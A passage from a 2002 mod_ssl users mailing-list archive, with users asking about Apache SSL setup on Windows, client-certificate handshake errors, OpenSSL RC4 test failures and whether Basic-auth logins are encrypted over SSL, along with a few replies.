expect: d6 a1 41 a7 ec 3c 38 df bd 61 5a 11 62 e1 c7 ba 36 b6 78 58 00
error calculating RC4
output: 66 a0 0a 9f 91 f7 d6 f0 1f 7f 83 2b 9a 33 c0 0c 89 2e be 30 14 b0 de
87 40 01 42 78 00
expect: 66 a0 94 9f 8a f7 d6 89 1f 7f 83 2b a8 33 c0 0c 89 2e be 30 14 3c e2
87 40 01 1e cf 00
error calculating RC4
output: f1 64 41 a7 ec 3c 38 df bd 61 00
expect: d6 a1 41 a7 ec 3c 38 df bd 61 00
test end processing .error in RC4 length processing
output: f1 00
expect: d6 00
error in RC4 length processing
output: f1 64 00
expect: d6 a1 00
error in RC4 length processing
output: f1 64 41 00
expect: d6 a1 41 00
error in RC4 length processing
output: f1 64 41 a7 00
expect: d6 a1 41 a7 00
error in RC4 length processing
output: f1 64 41 a7 ec 00
expect: d6 a1 41 a7 ec 00
error in RC4 length processing
output: f1 64 41 a7 ec 3c 00
expect: d6 a1 41 a7 ec 3c 00
error in RC4 length processing
output: f1 64 41 a7 ec 3c 38 00
expect: d6 a1 41 a7 ec 3c 38 00
error in RC4 length processing
output: f1 64 41 a7 ec 3c 38 df 00
expect: d6 a1 41 a7 ec 3c 38 df 00
error in RC4 length processing

...snip...

make[1]: *** [test_rc4] Error 45
make: *** [tests] Error 2


-- 
Randall Perry
sysTame

Xserve Web Hosting/Co-location
Website Development/Promotion
Mac Consulting/Sales

http://www.systame.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 08:42:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04378; Wed, 27 Nov 2002 08:41:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA04367; Wed, 27 Nov 2002 08:40:27 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2A69F4CE6E0; Wed, 27 Nov 2002 08:40:27 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A5310286B1; Wed, 27 Nov 2002 08:26:43 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from main.gmane.org id VAA17741; Tue, 26 Nov 2002 21:37:19 +0100 (MET)
Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18GmLi-0006Kb-00
	for ; Tue, 26 Nov 2002 21:30:26 +0100
To: modssl-users@modssl.org
X-Injected-Via-Gmane: http://gmane.org/
Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18Gm55-000590-00
	for ; Tue, 26 Nov 2002 21:13:15 +0100
Path: not-for-mail
From: Paul Christmann 
Subject: Win32 Binary Builds
Date: Tue, 26 Nov 2002 14:15:30 -0600
Lines: 25
Message-ID: <3DE3D662.1050107@priorartisans.com>
NNTP-Posting-Host: route-216-227-98-91.telocity.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: main.gmane.org 1038341595 19777 216.227.98.91 (26 Nov 2002 20:13:15 GMT)
X-Complaints-To: usenet@main.gmane.org
NNTP-Posting-Date: Tue, 26 Nov 2002 20:13:15 +0000 (UTC)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Christmann 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm just installing my first Apache server on a W2K box, and I'd like to 
include SSL support.  From browsing this newsgroup and reading the 
apache docs, it appears that the following statements are true (please 
correct me if I'm wrong):

1.  mod_ssl source is now bundled in Apache 2.X
2.  No binary version of Apache 2.X is available with mod_ssl support.
3.  Compiling Apache source requires MSVC 5

I've found several links (thanks primarily to "hunter" for links and 
instructions) to downloading SSL executables built for Windows, and am 
starting to play with them.  But I am left with two questions:

1.  Why isn't there an Apache 2.X binary distribution with SSL?  As best 
I can tell, there is an issue with export laws.  But why doesn't that 
same issue apply to non-windows builds?

2.  I don't have (nor do I want to purchase) a MS license.  Without 
that, is there any way I can compile Apache 2.X?  (I have and use 
cygwin's gcc and make if that matters)

Thanks,

Paul Christmann


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 12:21:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA10568; Wed, 27 Nov 2002 12:20:32 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA10537; Wed, 27 Nov 2002 12:19:13 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7F69B4CE738; Wed, 27 Nov 2002 12:19:12 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EF90D2888E; Wed, 27 Nov 2002 12:11:16 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta9n.bluewin.ch id MAA09629; Wed, 27 Nov 2002 12:03:31 +0100 (MET)
Received: from webtrapc03 (213.3.2.81) by mta9n.bluewin.ch (Bluewin AG 6.5.032)
        id 3DAA821D00852773 for modssl-users@modssl.org; Wed, 27 Nov 2002 12:03:24 +0100
From: "Pierre-Yves Jaquenoud" 
To: 
Subject: Problems with a SSL conf.
Date: Wed, 27 Nov 2002 12:03:48 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pierre-Yves Jaquenoud" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
I'm using a Apache webserver version 2.0.43 and mod_ssl (the latest
version).
I configured the ssl.conf file and i start the webserver with the command
"apachectl startssl".

If i enable the following configuration instruction into the ssl.conf file :
"SSLVerifyClient require"
i can't connect to to my server and i received a strange composite error
into the error_log file:
[Wed Nov 27 11:55:17 2002] [error] Spurious SSL handshake interrupt [Hint:
Usual
ly just one of those OpenSSL confusions!?]
[Wed Nov 27 11:55:17 2002] [error] SSL Library Error: 336105671
error:140890C7:l
ib(20):func(137):reason(199)

What's wrong????

I'm not sure to pass the right certificate to the client. How have i to
proceed? Someone has maybe an example using an Apache webserver and a MSIE
6.0 client?

With my best regards.

P-Yves

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 12:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA11641; Wed, 27 Nov 2002 12:42:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailrelay.fazenda.sp.gov.br id MAA11634; Wed, 27 Nov 2002 12:41:56 +0100 (MET)
Received: (qmail 17381 invoked from network); 27 Nov 2002 11:41:46 -0000
Received: from unknown (HELO mx1.sede.fazenda.sp.gov.br) ([172.16.32.85])
          (envelope-sender )
          by mailrelay.fazenda.sp.gov.br (qmail-ldap-1.03) with SMTP
          for ; 27 Nov 2002 11:41:46 -0000
Received: (qmail 7061 invoked by uid 50007); 27 Nov 2002 11:41:46 -0000
Received: from asaugusto@fazenda.sp.gov.br by mx1.sede.fazenda.sp.gov.br
	 by uid 50004 with qmail-scanner-1.10 (. Clear:0. Processed in 1.054566 secs); 27 Nov 2002 11:41:46 -0000
X-Qmail-Scanner-Mail-From: asaugusto@fazenda.sp.gov.br via mx1.sede.fazenda.sp.gov.br
X-Qmail-Scanner: 1.10 (Clear:0. Processed in 1.054566 secs)
Received: from unknown (HELO fazenda.sp.gov.br) (asaugusto@[172.16.35.233])
          (envelope-sender )
          by mx1.sede.fazenda.sp.gov.br (qmail-ldap-1.03) with SMTP
          for ; 27 Nov 2002 11:41:44 -0000
Message-ID: <3DE4970E.1A425827@fazenda.sp.gov.br>
Date: Wed, 27 Nov 2002 07:57:34 -0200
From: Alexandre 
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-16mdk i586)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with a SSL conf.
References: 
Content-Type: multipart/mixed;
 boundary="------------C460EC7D7B0E15C297F0746E"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alexandre 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------C460EC7D7B0E15C297F0746E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

i was have this problem  at  3 days ago.
i cant know what cause this problem, so, i restore a backup ...


good look


Alexandre

Pierre-Yves Jaquenoud wrote:

> Hi,
> I'm using a Apache webserver version 2.0.43 and mod_ssl (the latest
> version).
> I configured the ssl.conf file and i start the webserver with the command
> "apachectl startssl".
>
> If i enable the following configuration instruction into the ssl.conf file :
> "SSLVerifyClient require"
> i can't connect to to my server and i received a strange composite error
> into the error_log file:
> [Wed Nov 27 11:55:17 2002] [error] Spurious SSL handshake interrupt [Hint:
> Usual
> ly just one of those OpenSSL confusions!?]
> [Wed Nov 27 11:55:17 2002] [error] SSL Library Error: 336105671
> error:140890C7:l
> ib(20):func(137):reason(199)
>
> What's wrong????
>
> I'm not sure to pass the right certificate to the client. How have i to
> proceed? Someone has maybe an example using an Apache webserver and a MSIE
> 6.0 client?
>
> With my best regards.
>
> P-Yves
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--------------C460EC7D7B0E15C297F0746E
Content-Type: text/x-vcard; charset=us-ascii;
 name="asaugusto.vcf"
Content-Description: Card for Alexandre
Content-Disposition: attachment;
 filename="asaugusto.vcf"
Content-Transfer-Encoding: 7bit

begin:vcard 
n:da Silva Augusto;Alexandre 
x-mozilla-html:FALSE
org:Secretaria de Estado dos Negocios da Fazenda;DTI - Departamento de Tecnologia da Informacao
adr:;;;;;;
version:2.1
email;internet:asaugusto@fazenda.sp.gov.br
title:Administrador de Sistemas Unix
x-mozilla-cpt:;3424
fn:Alexandre da Silva Augusto
end:vcard

--------------C460EC7D7B0E15C297F0746E--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 13:20:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA13308; Wed, 27 Nov 2002 13:19:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th06.opsion.fr id NAA13272; Wed, 27 Nov 2002 13:18:41 +0100 (MET)
Received: from 212.180.95.194 [212.180.95.194] by th06.opsion.fr id 200211271217.1740; Wed, 27 Nov 2002 12:17:23 GMT
Message-ID: <3DE4B68C.8080501@ifrance.com>
Date: Wed, 27 Nov 2002 13:11:56 +0100
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems with a SSL conf.
References: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

SSLVerifyClient is for verify the client certificate in SSLv3
So maybe try to setup SSLProtocol SSLv3

I did that earlier and it's working fine

m.e


Pierre-Yves Jaquenoud wrote:

>Hi,
>I'm using a Apache webserver version 2.0.43 and mod_ssl (the latest
>version).
>I configured the ssl.conf file and i start the webserver with the command
>"apachectl startssl".
>
>If i enable the following configuration instruction into the ssl.conf file :
>"SSLVerifyClient require"
>i can't connect to to my server and i received a strange composite error
>into the error_log file:
>[Wed Nov 27 11:55:17 2002] [error] Spurious SSL handshake interrupt [Hint:
>Usual
>ly just one of those OpenSSL confusions!?]
>[Wed Nov 27 11:55:17 2002] [error] SSL Library Error: 336105671
>error:140890C7:l
>ib(20):func(137):reason(199)
>
>What's wrong????
>
>I'm not sure to pass the right certificate to the client. How have i to
>proceed? Someone has maybe an example using an Apache webserver and a MSIE
>6.0 client?
>
>With my best regards.
>
>P-Yves
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>__________________________________________________
>Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
>Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w
>
>  
>



__________________________________________________
Modem offert : 150,92 euros remboursés sur le Pack eXtense de Wanadoo ! 
Haut débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 15:22:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA17835; Wed, 27 Nov 2002 15:21:17 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts15-srv.bellnexxia.net id PAA17826; Wed, 27 Nov 2002 15:20:42 +0100 (MET)
Received: from localhost.localdomain ([64.231.121.188])
          by tomts15-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021127142041.RZOJ21453.tomts15-srv.bellnexxia.net@localhost.localdomain>
          for ; Wed, 27 Nov 2002 09:20:41 -0500
Subject: Re: Win32 Binary Builds
From: hunter 
To: modssl-users@modssl.org
In-Reply-To: <3DE3D662.1050107@priorartisans.com>
References: <3DE3D662.1050107@priorartisans.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 27 Nov 2002 09:20:46 -0500
Message-Id: <1038406846.9029.22.camel@ptak>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 2002-11-26 at 15:15, Paul Christmann wrote:
> I'm just installing my first Apache server on a W2K box, and I'd like to 
> include SSL support.  From browsing this newsgroup and reading the 
> apache docs, it appears that the following statements are true (please 
> correct me if I'm wrong):
> 
> 1.  mod_ssl source is now bundled in Apache 2.X

true

> 2.  No binary version of Apache 2.X is available with mod_ssl support.

true (sort of ... but) I am providing binaries

(preferred)

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

or

(limited bandwidth)

http://tor.ath.cx/~hunter/apache/Apache_1.3.27-Mod_SSL_2.8.12-OpenSSL_0.9.6g-Win32.zip
http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

http://tor.ath.cx/~hunter/apache/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip
 

> 3.  Compiling Apache source requires MSVC 5

false - I do not want to split hairs but it is built with MSVC 6

Also, I think Apache can be built with Cygwin and Mingw32 but I have not
done either yet.  I have Mingw32 compiling simple Win32 applications on
my Debian Linux box and will be trying eventually to build the Apache
binaries from Linux (cross-compile). Currently I use MSVC 6, MASM,
Cygwin(Bison,Flex,Awk), and Perl to build Apache.

Where I am employed I distribute as many as 20,000 Apaches - my Win32
binaries - they are compiled with SSL but not configured to use it. 

> 
> I've found several links (thanks primarily to "hunter" for links and 
> instructions) to downloading SSL executables built for Windows, and am 
> starting to play with them.  But I am left with two questions:
> 
> 1.  Why isn't there an Apache 2.X binary distribution with SSL?  As best 
> I can tell, there is an issue with export laws.  But why doesn't that 
> same issue apply to non-windows builds?
>
 
There is some uncertainty I suppose about the export laws, like you
say.  I do not know why this does not apply to non-windows.  

> 2.  I don't have (nor do I want to purchase) a MS license.  Without 
> that, is there any way I can compile Apache 2.X?  (I have and use 
> cygwin's gcc and make if that matters)
> 
When I updated my Cygwin I think there was the opportunity to get the
source and build Apache.  I did not do it that way since I have all of
the other tools.

I think you should give both Mingw32 and Cygwin another look.   

> Thanks,
> 
> Paul Christmann
> 

hunter



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 18:07:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA22458; Wed, 27 Nov 2002 18:06:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA22267; Wed, 27 Nov 2002 18:05:25 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BB40B4CE776; Wed, 27 Nov 2002 18:05:24 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2BC7E28892; Wed, 27 Nov 2002 18:05:13 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rwja.umdnj.edu id QAA20066; Wed, 27 Nov 2002 16:47:58 +0100 (MET)
Received: from J.FOX ([130.219.53.25])
	by rwja.umdnj.edu (8.9.3 (PHNE_24419)/8.9.3) with ESMTP id KAA14052
	for ; Wed, 27 Nov 2002 10:47:55 -0500 (EST)
Date: Wed, 27 Nov 2002 10:47:00 -0500 (Eastern Standard Time)
From: Jennifer Fox 
To: 
Subject: httpd.mm.sem
Message-ID: 
X-Warning: UNAuthenticated Sender
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jennifer Fox 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am very new to apache.  What exactly is the httpd.mm.*.sem file?  I have
4 of these files in my logs directory and all 4 are zero byte files.

Thanks!
Jennifer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 27 23:34:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA10293; Wed, 27 Nov 2002 23:33:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qm.aeroastro.com id XAA10286; Wed, 27 Nov 2002 23:32:20 +0100 (MET)
Received: from mbarton.aeroastro.com (qm.aeroastro.com [127.0.0.1])
	by qm.aeroastro.com (8.11.6/8.11.5) with ESMTP id gARMVoA13543
	for ; Wed, 27 Nov 2002 17:31:50 -0500
Message-Id: <5.1.0.14.0.20021127170328.01a82570@localhost>
X-Sender: mbarton@localhost
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 27 Nov 2002 17:31:49 -0500
To: modssl-users@modssl.org
From: Mark Barton 
Subject: What is a good way to determine this
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Barton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have what I think is probably an easy question to answer, but I have done 
some searching and have not found anything obvious. The gist of the 
question is:

I have mod_ssl running and have my entire site covered with it (there is 
nothing listening on port 80). I also have .htaccess files forcing people 
to log into the site. Is the username and password transaction from the 
.htaccess prompt encrypted, being as it is the first thing the user logging 
on is prompted to perform?

My gut feeling is, of course. I have SSL options protecting the directory 
and the .htaccess file (i will include those at the end). But the reason 
why I am doubting myself is the logs show me something sketchy. I have a 
Custom log that shows the username and SSL environment variables of the 
user logging in:

...
    LogFormat "%t \t%u \t--> 
%{SSL_CIPHER}e  %{SSL_CIPHER_USEKEYSIZE}e  %{SSL_PROTOCOL}e <-- 
\t%r"  sslformat
    CustomLog logs/ssl/mbsindassl.log sslformat
...

But here is the log file entry that I am worried about:
...
[27/Nov/2002:16:46:29 -0500] 	- 	--> -  -  - <-- 	GET /index.html HTTP/1.1
[27/Nov/2002:16:46:34 -0500] 	mbarton 	--> RC4-MD5  128  SSLv3 <-- 	GET 
/index.html HTTP/1.1
...

The log file shows first the request with no username (which makes sense 
because they haven't logged on yet) but the SSL environment variables are 
all NULL too. So is this just a problem with the way environment variables 
are reported to the log? Because it looks like there is not an SSL 
connection before the user logs in!

I have verifed that SSL is up and running and working correctly for the 
site with s_client.

The software I am using is:
Windows 2000
Apache 1.3.27
Mod_SSL 2.8.12
OpenSSL 0.9.6g


Here is the top-level .htaccess file
------------------------------------------------------------
AuthName "Dude, you had better be authorized"
AuthType Basic
AuthUserFile "C:/MBserver/Apache/bin/.htpasswd"

SSLRequireSSL
SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128

require user mbarton


Here is the relevant SSL Portion of the httpd.conf file
-----------------------------------------------------------------------------------



	AddType application/x-x509-ca-cert .crt
	AddType application/x-pkcs7-crl    .crl

	SSLMutex sem
	SSLSessionCache         dbm:logs/ssl/scache
	SSLSessionCacheTimeout  400
	SSLRandomSeed startup builtin
	SSLRandomSeed connect builtin
	SSLLog      logs/ssl/engine.log
    	SSLLogLevel warn

	

	DocumentRoot "C:/MBserver/Apache/secure"
	ErrorLog logs/ssl/error.log
	LogLevel debug	
	TransferLog logs/ssl/access.log
	LogLevel debug
	AccessFileName .htaccess

	LogFormat "%>s \t%u \t%r \t%t \t%f \t%h \t%a \t%A \t%c \t%b \t%e \t%p 
\t%s" docscommon
	LogFormat "%t \t%u \t%{Referer}i -> %U" docsreferer
	LogFormat "%t \t%u \t%{User-agent}i" docsagent
	LogFormat "%t \t%u \t%r" docssmall
    	LogFormat "%t \t%u \t--> 
%{SSL_CIPHER}e  %{SSL_CIPHER_USEKEYSIZE}e  %{SSL_PROTOCOL}e <-- 
\t%r"  sslformat

    	CustomLog logs/ssl/mbsinda.log docscommon
	CustomLog logs/ssl/mbsindareferer.log docsreferer
	CustomLog logs/ssl/mbsindaagent.log docsagent
	CustomLog logs/ssl/mbsindasmall.log docssmall
    	CustomLog logs/ssl/mbsindassl.log sslformat

	ScriptAlias /cgi-bin/ "C:/MBserver/Apache/secure/cgi-bin/"

	
	   SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
	   SSLOptions +StdEnvVars +ExportCertData
	

	SSLProtocol -all +SSLv3
	SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+SSLv3:-EXP:-LOW:-SSLv2

	SSLCertificateFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaSSL.crt"
	SSLCertificateKeyFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaSSL.key"
    	SSLCACertificateFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaCA.crt"
    	SSLCACertificatePath "C:/MBserver/Apache/conf/ssl-AA"
	SSLOptions +CompatEnvVars +StdEnvVars
	SSLEngine on

	



I appreciate you guys taking a look at this,

Thanks,
Mark Barton

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 14:01:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA03013; Thu, 28 Nov 2002 14:00:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from narada id NAA02869; Thu, 28 Nov 2002 13:59:19 +0100 (MET)
Received: from Bhima.softhome.net (unknown [192.168.0.161])
	by narada (Postfix) with ESMTP id 58E1394044
	for ; Thu, 28 Nov 2002 13:36:58 -0500 (EST)
Message-Id: <5.2.0.9.0.20021128183206.009fddb0@mail.SoftHome.net>
X-Sender: blessonpaul@mail.SoftHome.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9
Date: Thu, 28 Nov 2002 18:33:14 -0400
To: modssl-users@modssl.org
From: Blesson Paul 
Subject: How to read the html content
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Blesson Paul 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all
		I am a newbie to  this list. I need to know how mod_ssl gets the 
content(I mean the HTML message body) which the apache sends to the client. 
If it is difficult to explain, atleast please tell in which part of code, 
it is described

Thanking in advance
regards
Blesson Paul

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 14:45:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA04204; Thu, 28 Nov 2002 14:44:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA04193; Thu, 28 Nov 2002 14:43:11 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D63364CE772; Thu, 28 Nov 2002 14:43:10 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DA3E528893; Thu, 28 Nov 2002 14:41:14 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from srv-mailweb.onwave.com id MAA00421; Thu, 28 Nov 2002 12:34:04 +0100 (MET)
Received: from pcowzigu ([192.168.100.144])
	by srv-mailweb.onwave.com (8.11.6/8.11.6) with SMTP id gASBWPr15075
	for ; Thu, 28 Nov 2002 12:32:25 +0100
Message-ID: <001901c296d2$02fe8b50$9064a8c0@onwave.com>
From: "Irune Garay Urrutia" 
To: 
Subject: Problems
Date: Thu, 28 Nov 2002 12:33:45 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0016_01C296DA.64798E40"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2014.211
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Irune Garay Urrutia" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0016_01C296DA.64798E40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dear Sir,

I am trying to run Apache 2.0.43 with openssl-0.9.6g. I think I have it =
well configured, but when trying to establish a secure connection I get =
this error:
    error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocoll
would you be so gratefull to tell me what can I do to resolve my =
problem?

Than you in advance.
Yours sincerelly,

            Irune Garay
      Irune Garay Urrutia
      Soporte T=E9cnico
      Marketing y Ventas



      owasys
     Parque Tecnol=F3gico, 207-B
      E-48170 Zamudio, Vizcaya[Spain]
      Tel:  +34 946 025 356
      Fax: +34 946 025 353
      irune.garay@owasys.com
      www.owasys.com
      Advanced Wireless Devices
    =20


------=_NextPart_000_0016_01C296DA.64798E40
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Dear Sir,


 


I am trying to run Apache 2.0.43 with=20
openssl-0.9.6g. I think I have it well configured, but when trying to =
establish=20
a secure connection I get this error:


    error:140770FC:SSL=20
routines:SSL23_GET_SERVER_HELLO:unknown protocoll


would you be so gratefull to tell me =
what can I do=20
to resolve my problem?


 


Than you in advance.


Yours sincerelly,


 


       =20
    Irune Garay







  
  

    
      
Irune Garay =
Urrutia
Soporte=20
      T=E9cnico
Marketing y =
Ventas
      
 
      
owasys

    Parque Tecnol=F3gico, =

      207-B
E-48170 Zamudio,=20
      Vizcaya[Spain]
Tel:  +34 946 =
025=20
      356
Fax: +34 946 025=20
      353
irune.garay@owasys.com
www.owasys.com
      
Advanced =
Wireless=20
      =
Devices


------=_NextPart_000_0016_01C296DA.64798E40--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 15:46:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA06687; Thu, 28 Nov 2002 15:45:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
